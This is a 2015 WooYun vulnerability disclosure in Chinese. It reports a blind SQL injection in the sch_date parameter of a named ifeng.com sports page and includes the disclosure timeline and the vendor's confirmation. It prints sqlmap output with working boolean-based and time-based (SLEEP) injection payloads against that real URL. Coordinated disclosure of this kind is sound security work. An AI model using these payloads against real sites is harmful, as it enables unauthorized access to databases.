凤凰网某站存在SQL盲注漏洞(附测试脚本)

漏洞概要

缺陷编号:WooYun-2015-092655

漏洞标题:凤凰网某站存在SQL盲注漏洞(附测试脚本)

相关厂商:凤凰网

漏洞作者:路人甲

提交时间:2015-02-25 12:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-02-25: 细节已通知厂商并且等待厂商处理中
2015-02-27: 厂商已经确认,细节仅向厂商公开
2015-03-09: 细节向核心白帽子及相关领域专家公开
2015-03-19: 细节向普通白帽子公开
2015-03-29: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

233

详细说明:

url:http://sports.ifeng.com/nba/team/match/14?sch_date=2014-0通过sleep()测试,发现该处存在问题,不过好像有有过滤。请求串稍微复杂点就500了。漏洞证明详情如下图:

漏洞证明:

sqlmap跑下:---Place: GETParameter: sch_dateType: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: sch_date=2014-02' AND 9722=9722 AND 'SIqG'='SIqGType: AND/OR time-based blindTitle: MySQL > 5.0.11 AND time-based blindPayload: sch_date=2014-02' AND SLEEP(5) AND 'VExj'='VExj---[11:09:34] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL 5.0.11数据库是不是加密了,跑出来的都是乱码?

修复方案:

1,修复2,求15rank!!!3,1,2完成后第三集就来了。哈哈

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-02-2718:04

厂商回复:

非常感谢您对凤凰网信息安全的帮助。

最新状态:

暂无

评价